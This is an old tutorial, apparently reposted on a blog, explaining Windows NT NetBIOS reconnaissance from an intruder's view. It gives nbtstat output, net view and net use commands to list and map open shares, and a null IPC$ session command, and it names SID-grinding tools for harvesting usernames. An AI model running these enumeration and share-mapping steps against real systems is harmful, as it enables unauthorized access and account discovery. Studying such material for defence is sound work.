   -c    Lists the remote name cache including the IP addresses.
   -n    Lists local NetBIOS names.
   -r    Lists names resolved by broadcast and via WINS.
   -R    Purges and reloads the remote cache name table.
   -S    Lists sessions table with the destination IP addresses.
   -s    Lists sessions table conversions.

The column headings generated by NBTSTAT have the following meanings:

Input
     Number of bytes received.
Output
     Number of bytes sent.
In/Out
     Whether the connection is from the computer (outbound)
     or from another system to the local computer (inbound).
Life
     The remaining time that a name table cache entry will "live"
     before your computer purges it.
Local Name
     The local NetBIOS name given to the connection.
Remote Host
     The name or IP address of the remote host.
Type
     A name can have one of two types: unique or group.
     The last byte of the 16 character NetBIOS name often
     means something because the same name can be present
     multiple times on the same computer. This shows the last
     byte of the name converted into hex.
State
     Your NetBIOS connections will be shown in one of the
     following "states":

State                   Meaning

Accepting         An incoming connection is in process.

Associated        The endpoint for a connection has been created
                      and your computer has associated it with an IP
                      address.

Connected         This is a good state! It means you're connected
                       to the remote resource.

Connecting        Your session is trying to resolve the name-to-IP
                       address mapping of the destination resource.

Disconnected      Your computer requested a disconnect, and it is
                        waiting for the remote computer to do so.

Disconnecting     Your connection is ending.

Idle              The remote computer has been opened in the current
                   session, but is currently not accepting connections.

Inbound              An inbound session is trying to connect.

Listening            The remote computer is available.

Outbound             Your session is creating the TCP connection.

Reconnecting      If your connection failed on the first attempt,
                        it will display this state as it tries to reconnect.

Here is a sample NBTSTAT response of my NT Box:

C:\>nbtstat -A 195.171.236.139

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
MR_B10NDE      <00>  UNIQUE      Registered
WINSEKURE LABS <00>  GROUP       Registered
MR_B10NDE      <03>  UNIQUE      Registered
MR_B10NDE      <20>  UNIQUE      Registered
WINSEKURE LABS <1E>  GROUP       Registered

MAC Address = 44-45-53-54-00-00

Using the table below, what can you learn about the machine?

Name            Number        Type        Usage
=========================================================================
    00        U        Workstation Service
    01        U        Messenger Service
<\\_MSBROWSE_>    01        G        Master Browser
    03        U        Messenger Service
    06        U        RAS Server Service
    1F        U        NetDDE Service
    20        U        File Server Service
    21        U        RAS Client Service
    22        U        Exchange Interchange
    23        U        Exchange Store
    24        U        Exchange Directory
    30        U        Modem Sharing Server Service
    31        U        Modem Sharing Client Service
    43        U        SMS Client Remote Control
    44        U        SMS Admin Remote Control Tool
    45        U        SMS Client Remote Chat
    46        U        SMS Client Remote Transfer
    4C        U        DEC Pathworks TCPIP Service
    52        U        DEC Pathworks TCPIP Service
    87        U        Exchange MTA
    6A        U        Exchange IMC
    BE        U        Network Monitor Agent
    BF        U        Network Monitor Apps
    03        U        Messenger Service
    00        G        Domain Name
    1B        U        Domain Master Browser
    1C        G        Domain Controllers
    1D        U         Master Browser
    1E        G        Browser Service Elections
    1C        G        Internet Information Server
 00        U        Internet Information Server
    [2B]        U        Lotus Notes Server
IRISMULTICAST    [2F]        G        Lotus Notes
IRISNAMESERVER    [33]        G        Lotus Notes
Forte_$ND800ZA    [20]        U        DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0.

An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with it’s share of vulnerabilities, so this type of information is certainly useful to an intruder.

The next step for an intruder would be to try and list the open shares on the given computer, using the net view command, Here is an example of the net view command used against my box with the open shares C:\ and C:\MP3S\

C:\>net view \\195.171.236.139
Shared resources at \\195.171.236.139

Sharename    Type         Comment
-----------------------------------------------------------------
C            Disk         Drive C:\
MP3S         Disk         My collection of MP3s
The command was completed successfully.

This information would give the intruder a list of shares which he would then use in conjunction with the net use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive which he could then browse:

C:\>net use G: \\195.171.236.139\C
The command was completed successfully.

C:\>G:

G:\>

However, If the intruder was targetting a large network rather than a single remote computer, the next logical step would be to glean possible usernames from the remote machine.

A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins.

Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computernames. Gleaning usernames can also be accomplished through a null IPC session and the SID tools

The IPC$ (Inter-Process Communication) share is a standard hidden share on an NT machine which is mainly used for server to server communication. NT machines were designed to connect to each other and obtain different types of necessary information through this share. As with many design features in any operating system, intruders have learned to use this feature for their own purposes. By connecting to this share an intruder has, for all technical purposes, a valid connection to your server. By connecting to this share as null, the intruder has been able to establish this connection without providing it with credentials.

To connect to the IPC$ share as null, an intruder would issue the following command from a command prompt:

c:\>net use \\[ip address of target machine]\ipc$ "" /user:""

If the connection is successful, the intruder could do a number of things other than gleaning a user list, but lets start with that first. As mentioned earlier, this technique requires a null IPC session and the SID tools. Written by Evgenii Rudnyi, the SID tools come in two different parts, User2sid and Sid2user. User2sid will take an account name or group and give you the corresponding SID. Sid2user will take a SID and give you the name of the corresponding user or group. As a stand alone tool, this process is manual and very time consuming. Userlist.pl is a perl script written by Mnemonix that will automate this process of SID grinding, which drastically cuts down on the time it would take an intruder to glean this information.

At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed (within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other venues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine.

Such things as account lockout, minimum password length, password age cycling, password uniqueness settings as well as every user, the groups they belong to and the individual domain restrictions for that user – all through a null IPC session. This information gathering ability will appear in Rhino9′s soon to be released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session will be discussed below.

With the null IPC session, an intruder could also obtain a list of network shares that may not otherwise be obtainable. For obvious reasons, an intruder would like to know what network shares you have available on your machines. For this information gathering, the standard net view command is used, as follows:

c:\>net view \\[ip address of remote machine]

Depending on the security policy of the target machine, this list may or may not be denied. Take the example below (ip address has been left out for obvious reasons):

C:\>net view \\0.0.0.0
System error 5 has occurred.

Access is denied.

C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.

C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0

Share name   Type         Used as  Comment

---------------------------------------------------------------------
Accelerator  Disk                  Agent Accelerator share for Seagate backup
Inetpub      Disk
mirc         Disk
NETLOGON     Disk                  Logon server share
www_pages    Disk
The command completed successfully.

As you can see, the list of shares on that server was not available until after the IPC null session had been established. At this point you may begin to realize just how dangerous this IPC connection can be, but the IPC techniques that are known to us now are actually very basic. The possibilities that are presented with the IPC share are just beginning to be explored.

Once this list of shares had been given, the intruder could then proceed to issue the net use commands as described above.
Diposting oleh meg 0 komentar